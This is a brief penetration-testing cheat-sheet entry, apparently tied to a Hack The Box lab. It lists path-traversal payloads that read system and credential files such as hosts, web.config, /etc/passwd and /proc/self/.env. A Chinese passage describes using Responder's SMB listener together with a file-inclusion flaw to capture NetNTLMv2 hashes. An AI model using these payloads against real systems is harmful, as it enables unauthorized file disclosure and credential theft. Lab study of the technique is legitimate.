C:/Windows/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/Windows/system.ini
../Windows/System32/drivers/etc/hosts
../Windows/win.ini
../Windows/system.ini
/inetpub/wwwroot/web.config
../../web.config
../etc/passwd
../../../../../../../../proc/self/cwd/
../../../../../../../../proc/self/.env
在大多数情况下,Windows 系统有个便利特性:当尝试读取共享目录中的文件时,系统会自动尝试从该共享位置打开文件。这时候可以尝试使用Responder 工具并让它读取我主机上的文件:
开启 Responder 监听,它会自动在我们的主机445端口开启一个SMB服务器,然后利用LFI远程包含我的SMB服务器上的文件
参考:HTB LustrousTwo > 1.5.1. NetNTLMv2